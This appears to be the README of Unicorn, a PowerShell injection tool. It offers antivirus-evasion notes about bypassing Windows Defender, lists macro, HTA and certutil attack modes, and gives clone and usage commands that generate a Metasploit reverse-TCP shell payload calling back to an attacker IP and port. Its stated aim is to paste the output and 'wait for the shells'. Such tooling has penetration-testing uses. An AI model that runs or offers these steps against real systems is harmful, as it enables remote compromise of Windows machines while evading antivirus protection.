* most AVs were flagging on -enc instead of -EncodedCommand along with base64 would flag windows defender.. looks like this gets around it on both macro and standard ps1/encoded command params.
Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.
+ Metasploit Framework
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERUTIL Attack Instruction
+ Custom PS1 Attack Instructions
git clone https://github.com/trustedsec/unicorn && cd unicorn
git pull origin master
python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443